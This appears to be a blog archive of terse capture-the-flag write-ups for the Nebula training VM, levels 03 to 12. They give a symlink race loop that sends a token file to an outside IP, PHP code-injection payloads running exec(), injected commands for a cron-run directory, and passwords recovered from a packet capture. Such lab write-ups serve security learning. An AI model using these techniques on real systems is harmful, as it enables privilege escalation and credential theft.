Thursday, June 30, 2016

Exploit Exercises - nebula level12


Exploit Exercises - nebula level12



Confirm Command Injection. Redirect output to local file /tmp/foo.


getflag


+++++

Exploit Exercises - nebula level10


Exploit Exercises - nebula level10


Researching on access() requirements, we find this:



Level10 dir has a file x which contains the token / password for flag10. It shouldn't be there. We need to find a way to transfer the token file.


We don’t have access to token.


We will need to exploit race conditions with access() calls used in the program code:



Checking how flag10 works normally:




Ok.

Following steps are needed to exploit access() race condition:

  1. Create a fake token file - echo fake_toke > /tmp/fake_token
  2. Create soft link of our fake_token - ln -sf /tmp/fake_token token
  3. Create soft link of real token with same name - ln -s /home/flag10/token token
  4. Eexecute 1 & 2 in a loop - while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute file transfer in a loop - while true; do /home/flag10/flag10 token 192.168.49.1; done





Token is transferred successfully. Use it to log in as flag10 and run getflag.


+++++

Exploit Exercises - nebula level09

Exploit Exercises - nebula level09



flag09 reads the file supplied as arg1. We also need to supply a second arg but it is not used. If we do not supply arg2, an error is thrown but file specified by arg1 is still read.


After trial & error, found the correct syntax that flag09 accepts.
    [email $phpinfo()]

This makes flag09 treat the phpinfo() as a valid variable - but throws an error.



Success - 0.1 - found correct syntax to get phpinfo() executed ->
    [email {${phpinfo()}}]



Success - using php’s exec() method to execute getflag/id
    [email {${exec(id)}}]


+++++

Wednesday, June 29, 2016

Exploit Exercises - nebula level08

Exploit Exercises - nebula level08





Use tcpflow to read capture.pcap:
# tcpflow -c -e -r capture.pcap | more


Password seen -> backdoor…00Rm8.ate



Each dot is a back-space (delete) keypress. The correct password is -> backd00Rmate


+++++

Exploit Exercises - nebula level07

Exploit Exercises - nebula level07




Command Injection confirmed.




Web server is running on TCP 7007.


Execute index.cgi with our payload. Results stored in index.cgi output file.


+++++

Exploit Exercises - nebula level06

Exploit Exercises - nebula level06


# password cracked - hello




+++++

Tuesday, June 28, 2016

Exploit Exercises - nebula level05


Exploit Exercises - nebula level05








+++++

Exploit Exercises - nebula level03

Exploit Exercises - nebula level03


# echo ""id" > /tmp/pwn_log" >> /home/flag03/writeable.d/run_this
# echo ""getflag" >> /tmp/pwn_log" >> /home/flag03/writeable.d/run_this




writeable.sh script reads input from any file in writeable.d directory, and executes it. Since it does not print an output, we will need to redirect the command run output to a file.



+++++

Exploit Exercises - nebula level04


Exploit Exercises - nebula level04







+++++

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.